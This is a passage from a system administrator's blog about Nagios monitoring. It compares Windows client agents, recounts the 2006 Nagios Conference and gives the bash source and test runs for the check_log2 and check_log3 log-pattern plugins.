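# send_nsca expects: host<TAB>service<TAB>return code<TAB>plugin output
printf "remote-host\tD_ROOT\t%s\t%s\n" "$status" "$output" | \
    /usr/local/nagios/bin/send_nsca -H nagios-server -c /usr/local/nagios/etc/send_nsca.cfg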


Naturally you are absolutely free to combine two or more of the methods described above. You could poll through NRPE and receive SNMP traps in one environment. This will have both ups and downs, but it's up to your own discretion. Use the tools that feel natural to you, or use those that are already standard in your environment.

I realise I've rushed through things a little bit, but I was in a slight hurry :) I will go over this article a second time RSN, to apply some polish.


kilala.nl tags: , , , ,

View or add comments (curr. 1)

How do Nagios clients on Windows communicate?

2006-06-01 00:00:00

After reading through my small write-up on Nagios clients on UNIX you may also be interested in the same story for Windows systems.

Since Nagios was originally written with UNIX systems in mind, it'll be a little bit trickier to get the same amount of information from a Windows box. Luckily there are a few tools available that will help you along the way.

For a quick introduction the Nagios clients, read the write-up linked above. Or pick it from the menu on the left.


A quick comparison

                | NSClient      | NRPEnt        | NSClient++     | SNMP          | SNMP traps     | NC_net **
Connection      | Srv -> Clnt   | Srv -> Clnt   | Srv -> Clnt    | Srv -> Clnt   | Clnt -> Srv    | Clnt -> Srv
initiation      |               |               |                |               |                | Srv -> Clnt
Security        | Password      | Password      | Password       | Access List   | Access List    | Encryption
                |               | Encryption    | Encryption *   | Password      | Password       | ACL
                |               |               | ACL            |               |                |
Configuration   | On client     | On client     | On client      | On client     | On client and  | On client
                |               |               |                |               | on server      |
Difficulty      | Moderate      | Moderate      | Moderate       | Hard          | Hard           | Moderate
Resource        | unknown       | unknown       | 9MB RAM        | unknown       | unknown        | 30MB RAM
usage ***       |               |               |                |               |                |
Available       | Here          | Here          | Here           | Here          | Here           | Here

*: Thanks to Jeronimo Zucco for pointing out that encryption in NSClient++ only works when used with the NRPE DLL.

**: Thanks to Anthony Montibello for pointing out recent changes to NC_Net, which is now at version 3.

***: Thanks to Kyle Hasegawa for providing me with resource usage info on the various clients.


NSClient

NSClient was originally written to work with Nagios when it was still called NetSaint: a long, long time ago. NSClient only provides you with access to a very small number of system metrics, including those that are usually available through the Windows Performance Tool.

Personally I have no love for this tool since it is quite fiddly to use. In order to use NSClient on your systems, you will need to do the following.

You can now set up your services.cfg in such a way that each remote service is checked like so:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_nt_disk!C!85!95

}

Your check command definition would look something like this:

define command {

   command_name check_nt_disk

   command_line /usr/local/nagios/libexec/check_nt -H $HOSTADDRESS$ -p 1248 -v USEDDISKSPACE -l $ARG1$ -w $ARG2$ -c $ARG3$

}



NRPEnt

NRPEnt is basically a drop-in replacement for NRPE on Windows. It really does work the same way: on the Nagios server you run check_nrpe and on the Windows side you have plugins to run locally. These plugins can be binaries, Perl scripts, VBScript, .BAT files, whatever.

To set things up, you'll need the same things as with the normal NRPE.

You can now set up your services.cfg in such a way that each remote service is checked like so:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command check_nrpe!check_root

}

And in nrpent.cfg on the client you would need to include:

command[check_root]=C:\windows\system32\cscript.exe //NoLogo //T:10 c:\nrpe_nt\check_disk.wsf /drive:"c:/" /w:300 /c:100



NSClient++

Due to the limited use provided by NSClient, someone decided to create NSClient++. This piece of software is a lot more useful because it actually combines the functionality of the original NSClient and that of NRPEnt into one Windows daemon.

NSClient++ includes the same security measures as NRPEnt and NSClient, but adds an ACL functionality on top of that.

On the configuration side things are basically the same as with NSClient and NRPEnt. You can use both methods to talk to a client running NSClient++.



SNMP

Unfortunately I haven't yet worked with SNMP on Windows systems, so I can't tell you much about this. I'm sure though that things won't be much different from the UNIX side. So please check the Nagios UNIX clients story for the full details.

To make proper use of monitoring through SNMP you'll need to:

Ufortunately the check_snmp script that comes with Nagios isn't flexible enough to let you monitor custom SNMP objects in a nice way. This is why I wrote the retrieve_custom_nagios script, which is available from the menu. Your service definition would look like this:

define service{

   host_name remote-host

   service_description D_ROOT

   check_command retrieve_custom_snmp!.1.3.6.1.4.1.6886.4.1.4

}

As I said, I haven't configured a Windows SNMP daemon before, so I really can't tell you what the config would look like. Just look for options similar to "EXEC", which allows you to run a certain command on demand.

Just as is the case with UNIX systems you will need to dig around the MIB files provided to you by Microsoft and your hardware vendors to find the OIDs for interesting metrics. It's not an easy job, but with some luck you'll find a website where someone's already done the hard work for you :)



SNMP traps

SNMP doesn't involve polling alone. SNMP-enabled devices can also be configured to automatically send status updates to a so-called trap host. The downside to receiving SNMP traps with Nagios is that it takes quite a lot of work to get them into Nagios :D

To make proper use of monitoring through SNMP traps you'll need to:

There are -many- ways to get the SNMP traps translated for Nagios' purposes, 'cause there's many roads that lead to Rome. Unfortunately none of them are very easy to use.



NC_net

NC_net is another replacement for the original NSClient daemon. It performs the same basic checks, plus a few additional ones, but it is not extensible with your own scripts (like NRPEnt is).

So why run NC_net instead of NSClient++? Because it is capable of sending passive check results to your Nagios server using a send_nsca-alike method. So if you're going all the way in making all your service checks passive, then NC_net is the way to go.

I haven't worked with NC_net yet, so I can't tell you anything about how it works. Too bad :(

UPDATE 31/10/2006:
I was informed by Marlo Bell of the Nagios mailing list that NC_net version 3.x does indeed allow running your own scripts and calling them through the NRPEnt interface! That's great to know, as it does in fact make NC_net the most versatile solution for monitoring your Windows systems with Nagios.

Also, Anthony Montibello (lead NC_Net dev) tells me that NC_Net 3 requires dotNET 2.0.


kilala.nl tags: , , , ,

View or add comments (curr. 7)

Nagios Conference 2006, Nurnberg

2006-06-01 00:00:00

September 21-22 of 2006 saw the first annual Nagios Conference. Organised by the good folk of Netways, the conference was attended by around 130 people (mostly Germans, with some foreigners thrown in for fun).

Originally I posted some comments about the conference on my blog, but I thought I'd move them over into the Sysadmin section, to keep Google from thinking the Archives had content about Nagios :D

Day 0

Wow... Today was a long day :)

Left Utrecht around 09:30 and finally arrived at the hotel at 17:30. Eight hours, just as I predicted! 6 hours driving (0.5 of which due to delays) and 2 hours spent resting. Speaking of: I -love- the German Autobahn! They are littered with comfortable places to take a break and there's also an abundance of what they call a Rasthof: parking space, combined with restaurants, gas station, maybe a hotel, a few shops and very cool sanitary facilities (by the Sanifair company). I'll talk about those some more another time :)

What else is there to tell? I showered, I unpacked, we had dinner with the whole group and I met some interesting people. *waves* Hi Stephan! Hi Jorg! *waves*

Now... I feel really tired (I also notice that it's getting harder for me to string together coherent thought, despite the recent cappuccino), so I'd better get to bed... I'm actually quite woozy in the head! :)

Tomorrow the conference'll start, so I'd better be at my best!

Day 1

So far, it's been an interesting day.

In the morning, Ethan Galstad (main Nagios developer) covered his plans for the future. Version 3.x (improved notification, expanded plugin output, custom variables and a greatly improved method for host checking) will Alpha in October and Stable somewhere this winter, while 4.x (a new PHP-based GUI, among other things) is on the long-term roadmap.

After that Michael Kienle and Markus Kosters told us a few things about the practical side of implementing Nagios in your organisation. I was already familiar with most of what they told us, but it must've been an eye opener for a lot of people! The notion that Nagios needs much more than just "download and install" is apparently foreign to a lot of people, which comes back to bite them in the ass later.

Lunch was terrific. I don't know how they do it, but the Nurnberg Holiday Inn are perfectly capable of making a buffet-style meal that -is- quite edible and actually varied and tasty! Kudos to them!

While on the subject of the hotel... The hotel, the rooms, the facilities: they're all wonderful. Nice ambience, a swanky in-house cafe and comfortable furniture. I like it! I just have to wonder about one thing: why the heck are there at least a dozen brothels and sex clubs surrounding the hotel?! o_O

The afternoon saw two sessions regarding data collection and representation: RRDTool and NagiosGrapher. RRD itself couldn't interest me for long, but NagGraph (which relies on RRD) on the other hand could. NagGraph allows you to add somewhat complicated graphs to Nagios (inside the Nagios GUI), which gives you something that is a little similar to Cacti.

I had to skip the session on monitoring storage systems, because I -really- needed some fresh air. So I walked around Nurnberg's Altstadt for a while. Looks nice, I have to say :) Of course I was only able to see a small part of it, but hey... At least I got out for a while. [EDIT: Anand from ASAM told me afterwards that I didn't miss much. Apparently it was kind of a marketing spiel]

So... The plan for the rest of the day:

See you guys tomorrow!

Day 2

*phew* That was great! <3

I'm sitting here in my hotel room with some apple soda and some Pringles, feeling nice and drowsy thanks to the hotel's sauna. It felt real good, just spending an hour and a half relaxing.

Anywho... The conference today... Pretty darn interesting and it gave me a load of things to think about! In his morning session Ethan covered some things that you usually don't think of when configuring Nagios, but that can save you loads of trouble! A few of the things he mentioned I will actually try to work into the design of $CLIENT's new Nagios infra, 'cause else they may run into some problems later.

The rest of the morning for me was filled with two sessions on varying ways to get info into Nagios. On the one hand there was SNMPtt (trap translator), which to me seemed like a really backward solution to a problem that wasn't too difficult to start with. And on the other hand, there was EventDB whose goal is to have only one check command to access information provided by a great variety of sources. The only down-side being that you'll need translation adapters for each of these sources (which means that you basically are filling one hole by digging another).

Now I don't mean to be too negative about these two sessions. I'm sure that a lot of people are actually very happy to see these tools and that they will have some great uses for them.

Lunch... What can I say? It was great, just like yesterday. The hotel took great care of us, thanks to Netways.

After lunch, Ton Voon kicked off with a brief session on open source etiquette. Basically telling the attendees both the up and down sides their companies could experience by contributing to the Nagios community. As ever, Ton was charismatic and displayed a good sense of humor ^_^

Two Netways employees gave talks on:
1. The IT Portal they implemented at the Bundesverwaltungsamt. This is actually the same portal that Markus Kosters told us about yesterday, but Julian actually took time to show us the technology behind the portal.
2. Integrating Nagios with Asterisk (among other things), to allow for some nice telephone trickery. Mind you, Asterisk isn't really my thing, but I can imagine some people enjoying the idea of being called by the Nagios server to literally -tell- them (through a .WAV voice) that their server's down.

For me, the con was closed by a guy giving a marketing spiel about the services his company provides, but I was actually able to glean something useful from the talk.

Unfortunately there was no official closing ceremony, so the con ended quite abruptly. Which means that just about everyone stormed out of the building in the span of thirty minutes. I did however get to say goodbye to a few nice acquaintances I've made during these three days. And my hat's off to Anand who decided to drive home during the night (he lives in The Hague)... He should be arriving home, somewhere around 0200 ;_; Wow!

While waving off the last person to leave (Stephan), I met up with Ethan and his SO, Mary. We went to dinner together and I must say I enjoyed their company! Friendly folks and very down to earth. I believe that sometimes Ethan is just overwhelmed by all the attention people are willing to give him... Who could blame him?

Aside from Ethan and Mary, I'm the last conference attendee at the hotel. In the morning, I'll have a nice breakfast, grab some rolls at the bakery and head off home. I reckon I should get there around five-ish.


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios script: check_log2

2006-06-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Improved log checker for Solaris, with state retention.

I found that the version of check_log included in the default monitor package doesn't work perfectly on Solaris: it needs a bit of tweaking... Which is what I've done for the script.

Also, I've added state retention. It's a bit of a hack, but hey! I needed a quick solution.

The original script sends a Critical when it detects the string you've queried the log file for, but it clears that same Critical immediately if the same message is not repeated once the monitor runs again. Meaning that, if there are no updates to your log file, the Critical will only be around until the next time the monitor runs.

Not very handy if the Critical occurs during the night.

This new version of the script creates a file called $oldlog.STATE in /usr/local/nagios/var (which should be 755, nagios:nagios), which contains the exit status for the last detected _changed_ status... If there are no changes detected in your log file, this old exit state is repeated.

The script has been tested on Solaris 8, Mac OS X 10.4 and Redhat ES3.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!

Also stomped out a few horrendous bugs! I'm very sorry for putting out such a buggy script earlier... If you've started using the script in your environment, please download the latest version. Thanks to Ali Khan for pointing out these mistakes.
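
For reference, the Nagios side of things could look roughly like the sketch below. The log and state file paths and the generic-service template are examples; note the max_check_attempts of 1 and the missing 'r' in notification_options, as recommended in the script's own comments.

define command {
   command_name check_log2
   command_line /usr/local/nagios/libexec/check_log2 -F $ARG1$ -O $ARG2$ -Q $ARG3$
}

define service{
   use                   generic-service   ; assumed template providing the remaining directives
   host_name             remote-host
   service_description   SYSLOG_ERRORS
   check_command         check_log2!/var/log/messages!/usr/local/nagios/var/check_log.badlogins.old!"LOGIN FAILURE"
   max_check_attempts    1
   notification_options  w,c
}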


#!/bin/bash
#
# Log file pattern detector plugin for Nagios
# Written by Ethan Galstad (nagios@nagios.org)
# Last Modified: 07-31-1999
# Updated by Thomas Sluyter (nagiosATkilalaDOTnl)
# Last Modified: 19-06-2006
#
# Usage: ./check_log2 -F log_file -O old_log_file -Q pattern
#
# Description:
#
# This plugin will scan a log file (specified by the log_file option)
# for a specific pattern (specified by the pattern option).  Successive
# calls to the plugin script will only report *new* pattern matches in the
# log file, since a copy of the log file from the previous run is saved
# to old_log_file.
#
# Output:
#
# On the first run of the plugin, it will return an OK state with a message
# of "Log check data initialized".  On successive runs, it will return an OK
# state if *no* pattern matches have been found in the *difference* between the
# log file and the older copy of the log file.  If the plugin detects any 
# pattern matches in the log diff, it will return a CRITICAL state and print
# out a message in the following format: "(x) last_match", where "x" is the
# total number of pattern matches found in the file and "last_match" is the
# last entry in the log file which matches the pattern.
#
# Notes:
#
# If you use this plugin make sure to keep the following in mind:
#
#    1.  The "max_attempts" value for the service should be 1, as this
#        will prevent Nagios from retrying the service check (the
#        next time the check is run it will not produce the same results).
#
#    2.  The "notify_recovery" value for the service should be 0, so that
#        Nagios does not notify you of "recoveries" for the check.  Since
#        pattern matches in the log file will only be reported once and not
#        the next time, there will always be "recoveries" for the service, even
#        though recoveries really don't apply to this type of check.
#
#    3.  You *must* supply a different old_file_log for each service that
#        you define to use this plugin script - even if the different services
#        check the same log_file for pattern matches.  This is necessary
#        because of the way the script operates.
#
#    4.  Changes to the script were made by Thomas Sluyter (nagios@kilala.nl).
#	 The first set of changes will allow the script to run properly on Solaris, which
#	 it did not do by default. The second set of changes will allow the following:
#	 * State retention. If a NOK was generated at point A in time and it is not repeated
# 	   at A+1, then an OK is sent to Nagios. Not something that you would like to happen.
#	   I've added the $oldlog.STATE trigger file which retains the last exitstatus. Should
# 	   there be no new lines added to the log, check_log will simply repeat the last state
#	   instead of give an OK.
#
# Examples:
#
# Check for login failures in the syslog...
#
#   check_log -F /var/log/messages -O /usr/local/nagios/var/check_log.badlogins.old -Q "LOGIN FAILURE"
#
# Check for port scan alerts generated by Psionic's PortSentry software...
#
#   check_log -F /var/log/messages -O /usr/local/nagios/var/check_log.portscan.old -Q "attackalert"
#

# Paths to commands used in this script.  These
# may have to be modified to match your system setup.

PATH="/usr/bin:/usr/sbin:/bin:/sbin"

PROGNAME=`basename $0`
PROGPATH=`echo $0 | sed -e 's,[\\/][^\\/][^\\/]*$,,'`

#. $PROGPATH/utils.sh
. /usr/local/nagios/libexec/utils.sh

print_usage() {
    echo "Usage: $PROGNAME -F logfile -O oldlog -Q query"
    echo "Usage: $PROGNAME --help"
}

print_help() {
    echo ""
    print_usage
    echo ""
    echo "Log file pattern detector plugin for Nagios"
    echo ""
    support
}

# Make sure the correct number of command line
# arguments have been supplied

if [ $# -lt 6 ]; then
    print_usage
    exit $STATE_UNKNOWN
fi

# Grab the command line arguments

exitstatus=$STATE_WARNING #default
while test -n "$1"; do
    case "$1" in
        --help)
            print_help
            exit $STATE_OK
            ;;
        -h)
            print_help
            exit $STATE_OK
            ;;
        -F)
            logfile=$2
            shift
            ;;
        -O)
            oldlog=$2
            shift
            ;;
        -Q)
            query=$2
            shift
            ;;
        *)
            echo "Unknown argument: $1"
            print_usage
            exit $STATE_UNKNOWN
            ;;
    esac
    shift
done

# If the source log file doesn't exist, exit

if [ ! -e $logfile ]; then
    echo "Log check error: Log file $logfile does not exist!"
    echo $STATE_UNKNOWN > $oldlog.STATE
    exit $STATE_UNKNOWN
fi

# If the oldlog file doesn't exist, this must be the first time
# we're running this test, so copy the original log file over to
# the old diff file and exit

if [ ! -e $oldlog ]; then
    cat $logfile > $oldlog
    if [ `tail -1 $logfile | grep -i $query | wc -l` -gt 0 ]
    then
        echo "Log check data initialized... Last line contained error message."
        echo $STATE_CRITICAL > $oldlog.STATE
	exit $STATE_CRITICAL
    else
        echo "Log check data initialized..."
        echo $STATE_OK > $oldlog.STATE
        exit $STATE_OK
    fi
fi

# A bug which was caught very late:
# If newlog is shorter than oldlog, the diff used below will return
# false positives for the query because the matching lines will still be in $oldlog. Why?
# Because $oldlog is not rolled over / rotated, like $newlog. I need 
# to fix this in a kludgy way.

if [ `wc -l $logfile|awk '{print $1}'` -lt `wc -l $oldlog|awk '{print $1}'` ]
then
    rm $oldlog
    cat $logfile > $oldlog
    if [ `tail -1 $logfile | grep -i $query | wc -l` -gt 0 ]
    then
        echo "Log check data re-initialized... Last line contained error message."
        echo $STATE_CRITICAL > $oldlog.STATE
	exit $STATE_CRITICAL
    else
        echo "Log check data re-initialized..."
        echo $STATE_OK > $oldlog.STATE
        exit $STATE_OK
    fi
fi

# Everything seems fine, so compare it to the original log now

# The temporary file that the script should use while
# processing the log file.
if command -v mktemp >/dev/null 2>&1; then
    tempdiff=`mktemp /tmp/check_log.XXXXXXXXXX`
else
    tempdate=`/bin/date '+%H%M%S'`
    tempdiff="/tmp/check_log.${tempdate}"
    touch $tempdiff
fi

diff $logfile $oldlog > $tempdiff

if [ `wc -l $tempdiff|awk '{print $1}'` -eq 0 ]
then
     rm $tempdiff
     touch $oldlog.STATE
     exitstatus=`cat $oldlog.STATE`
     echo "LOG FILE - No status change detected. Status = $exitstatus"
     exit $exitstatus
fi

# Count the number of matching log entries we have
count=`grep -c "$query" $tempdiff`

# Get the last matching entry in the diff file
lastentry=`grep "$query" $tempdiff | tail -1`

rm -f $tempdiff
cat $logfile > $oldlog

if [ "$count" = "0" ]; then # no matches, exit with no error
    echo "Log check ok - 0 pattern matches found"
    exitstatus=$STATE_OK
else # Print total match count and the last entry we found
#    echo "($count) $lastentry"
    echo "Log check NOK - $lastentry"
    exitstatus=$STATE_CRITICAL
    echo $STATE_CRITICAL > $oldlog.STATE
fi

exit $exitstatus


echo "Starting clean"
rm /tmp/foobar /usr/local/nagios/var/foobar*
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""

echo "Starting normally"
echo "normal"
echo "normal" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "normal"
echo "normal" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "critical"
echo "neko" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""

echo "Log rotation with crit"
rm /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "critical"
echo "neko" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""

echo "Normal log rotation"
rm /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log2 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -Q neko
echo $?
echo ""


kilala.nl tags: , , ,

View or add comments (curr. 2)

Nagios script: check_log3

2006-06-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

Today I made an improved version of the Nagios monitor "check_log2", which is now aptly called "check_log3". It includes all the improvements I originally added to "check_log2", so you can simply use this as a drop-in replacement.

Version 3 of this script gives you the option to add a second query to the monitor.

The previous two incarnations of the script only allowed you to search for one query and would return a Critical if it was found. Now you can also add a query which will result in a Warning message as well. Goody! :3

1st of Feb, 2006:

Kyle Tucker pointed out that he had problems running this script with bash on Solaris. The changes he suggested have been worked into the newer version. Thanks Kyle :)

5th of Mar, 2006:

I finally got round to fix the script according to all the changes Kyle (and others) suggested. So here's another try! Right now I've tested the script on Red Hat, Mac OS X and Solaris, so it should be much better than before.

19th of June, 2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!

Also stomped out a few horrendous bugs! I'm very sorry for putting out such a buggy script earlier... If you've started using the script in your environment, please download the latest version. Thanks to Ali Khan for pointing out these mistakes.



#!/bin/bash
#
# Log file pattern detector plugin for Nagios
# Written by Ethan Galstad (nagios@nagios.org)
# Last Modified: 07-31-1999
# Heavily modified by Thomas Sluyter (nagiosATkilalaDOTnl)
# Last Modified: 19-06-2006
#
# Usage: ./check_log3 -F log_file -O old_log_file -C crit-pattern -W warn-pattern
#
# Description:
#
# This plugin will scan a log file (specified by the log_file option)
# for specific patterns (specified by the XXX-pattern options).  Successive
# calls to the plugin script will only report *new* pattern matches in the
# log file, since a copy of the log file from the previous run is saved
# to old_log_file.
#
# Output:
#
# On the first run of the plugin, it will return an OK state with a message
# of "Log check data initialized".  On successive runs, it will return an OK
# state if *no* pattern matches have been found in the *difference* between the
# log file and the older copy of the log file.  If the plugin detects any 
# pattern matches in the log diff, it will return a CRITICAL state and print
# out a message in the following format: "(x) last_match", where "x" is the
# total number of pattern matches found in the file and "last_match" is the
# last entry in the log file which matches the pattern.
#
# Notes:
#
# If you use this plugin make sure to keep the following in mind:
#
#    1.  The "max_attempts" value for the service should be 1, as this
#        will prevent Nagios from retrying the service check (the
#        next time the check is run it will not produce the same results).
#
#    2.  The "notify_recovery" value for the service should be 0, so that
#        Nagios does not notify you of "recoveries" for the check.  Since
#        pattern matches in the log file will only be reported once and not
#        the next time, there will always be "recoveries" for the service, even
#        though recoveries really don't apply to this type of check.
#
#    3.  You *must* supply a different old_file_log for each service that
#        you define to use this plugin script - even if the different services
#        check the same log_file for pattern matches.  This is necessary
#        because of the way the script operates.
#
#    4.  Changes to the script were made by Thomas Sluyter (cailin@kilala.nl).
#	 * The first set of changes will allow the script to run properly on Solaris, which
#	   it did not do by default. The second set of changes will allow the following:
#	 * State retention. In the original script, if a NOK was put into the log file
#	   at point A in time and it is not repeated at A+1, then an OK is sent to Nagios. 
# 	   Not something that you would like to happen.
#	      I've added the $oldlog.STATE trigger file which retains the last exitstatus. Should
# 	   there be no new lines added to the log, check_log will simply repeat the last state
#	   instead of give an OK.
#	      In order for this state retention to work properly your client system MUST
#	   HAVE THE DIRECTORY /USR/LOCAL/NAGIOS/VAR.
#        * Two queries. In the original script you could only enter one query which, when
#	   found, would result in  a Critical message being sent to Nagios. I've added the 
#	   possibility to add another query, which will result in a Warning message.
#	 * Bugfix: changed all instances of "crit-count" and "warn-count" to "critcount" and
#	   "warncount" after a tip from Kyle Tucker who ran into problems running this script
#	   with bash on Solaris.
#

# Paths to commands used in this script.  These
# may have to be modified to match your system setup.

PATH="/usr/bin:/usr/sbin:/bin:/sbin"

PROGNAME=`basename $0`
PROGPATH=`echo $0 | sed -e 's,[\\/][^\\/][^\\/]*$,,'`

#. $PROGPATH/utils.sh
. /usr/local/nagios/libexec/utils.sh

print_usage() {
    echo "Usage: $PROGNAME -F logfile -O oldlog -C CRITquery -W WARNquery"
    echo "Usage: $PROGNAME --help"
    echo "Usage: $PROGNAME --version"
}

print_help() {
    echo ""
    print_usage
    echo ""
    echo "Log file pattern detector plugin for Nagios"
    echo ""
    support
}

# Make sure the correct number of command line
# arguments have been supplied

if [ $# -lt 8 ]; then
    print_usage
    exit $STATE_UNKNOWN
fi

# Grab the command line arguments

exitstatus=$STATE_WARNING #default
while test -n "$1"; do
    case "$1" in
        --help)
            print_help
            exit $STATE_OK
            ;;
        -h)
            print_help
            exit $STATE_OK
            ;;
        -F)
            logfile=$2
            shift
            ;;
        -O)
            oldlog=$2
            shift
            ;;
        -C)
            CRITquery=$2
            shift
            ;;
        -W)
            WARNquery=$2
            shift
            ;;
        *)
            echo "Unknown argument: $1"
            print_usage
            exit $STATE_UNKNOWN
            ;;
    esac
    shift
done

# If the source log file doesn't exist, exit

if [ ! -e $logfile ]; then
    echo "Log check error: Log file $logfile does not exist!"
    echo $STATE_UNKNOWN > $oldlog.STATE
    exit $STATE_UNKNOWN
fi

# If the dump/temp log file doesn't exist, this must be the first time
# we're running this test, so copy the original log file over to
# the old diff file and exit

if [ ! -e $oldlog ]; then
    cat $logfile > $oldlog

    TEMPcount=0
    let TEMPcount=$TEMPcount+$(tail -1 $logfile | grep -i $WARNquery | wc -l | awk '{print $1}')
    let TEMPcount=$TEMPcount+$(tail -1 $logfile | grep -i $CRITquery | wc -l | awk '{print $1}')

    if [ $TEMPcount -gt 0 ]
    then
       echo "Log check data initialized... Last line contained error message."
       echo $STATE_WARNING > $oldlog.STATE
       exit $STATE_WARNING
    else
       echo "Log check data initialized..."
       echo $STATE_OK > $oldlog.STATE
       exit $STATE_OK
    fi
fi

# A bug which was caught very late:
# If newlog is shorter than oldlog, the diff used below will return
# false positives for the query because the matching lines will still be in $oldlog. Why?
# Because $oldlog is not rolled over / rotated, like $newlog. I need
# to fix this in a kludgy way.

if [ `wc -l $logfile|awk '{print $1}'` -lt `wc -l $oldlog|awk '{print $1}'` ]
then
    rm $oldlog
    cat $logfile > $oldlog
    TEMPcount=0
    let TEMPcount=$TEMPcount+$(tail -1 $logfile | grep -i $WARNquery | wc -l | awk '{print $1}')
    let TEMPcount=$TEMPcount+$(tail -1 $logfile | grep -i $CRITquery | wc -l | awk '{print $1}')

    if [ $TEMPcount -gt 0 ]
    then
       echo "Log check data initialized... Last line contained error message."
       echo $STATE_WARNING > $oldlog.STATE
       exit $STATE_WARNING
    else
       echo "Log check data initialized..."
       echo $STATE_OK > $oldlog.STATE
       exit $STATE_OK
    fi
fi

# The oldlog file exists, so compare it to the original log now

# The temporary file that the script should use while
# processing the log file.
if command -v mktemp >/dev/null 2>&1; then
    tempdiff=`mktemp /tmp/check_log.XXXXXXXXXX`
else
    tempdate=`/bin/date '+%H%M%S'`
    tempdiff="/tmp/check_log.${tempdate}"
    touch $tempdiff
fi

diff $logfile $oldlog > $tempdiff

if [ `wc -l $tempdiff | awk '{print $1}'` -eq 0 ]
then
     rm $tempdiff
     touch $oldlog.STATE
     exitstatus=`cat $oldlog.STATE`
     echo "LOG FILE - No status change detected. Status = $exitstatus"
     exit $exitstatus
fi

# Count the number of matching log entries we have
CRITcount=`grep -c "$CRITquery" $tempdiff`
WARNcount=`grep -c "$WARNquery" $tempdiff`

# Get the last matching entry in the diff file
CRITlastentry=`grep "$CRITquery" $tempdiff | tail -1`
WARNlastentry=`grep "$WARNquery" $tempdiff | tail -1`

rm $tempdiff
cat $logfile > $oldlog

if [ "$CRITcount" -gt 0 ]; then
    	echo "($CRITcount) $CRITlastentry"
    	echo $STATE_CRITICAL > $oldlog.STATE
	exit $STATE_CRITICAL
fi

if [ "$WARNcount" -gt 0 ]; then
    	echo "($WARNcount) $WARNlastentry"
    	echo $STATE_WARNING > $oldlog.STATE
	exit $STATE_WARNING
fi

echo "Log check ok - 0 pattern matches found"
exit $STATE_OK



echo "Starting clean"
rm /tmp/foobar /usr/local/nagios/var/foobar*
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""

echo "Starting normally"
echo "baka"
echo "normal" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "baka"
echo "normal" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "warning"
echo "bla" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "critical"
echo "neko" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "warning"
echo "bla" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""

echo "Log rotation with crit"
rm /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "critical"
echo "neko" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""

echo "Log rotation with warn"
rm /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "warning"
echo "bla" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""
echo "normal"
echo "baka" >> /tmp/foobar
/usr/local/nagios/libexec/check_log3 -F /tmp/foobar -O /usr/local/nagios/var/foobar.archive -C neko -W bla
echo $?
echo ""

echo "Normal log rotation"
rm /tmp/foobar
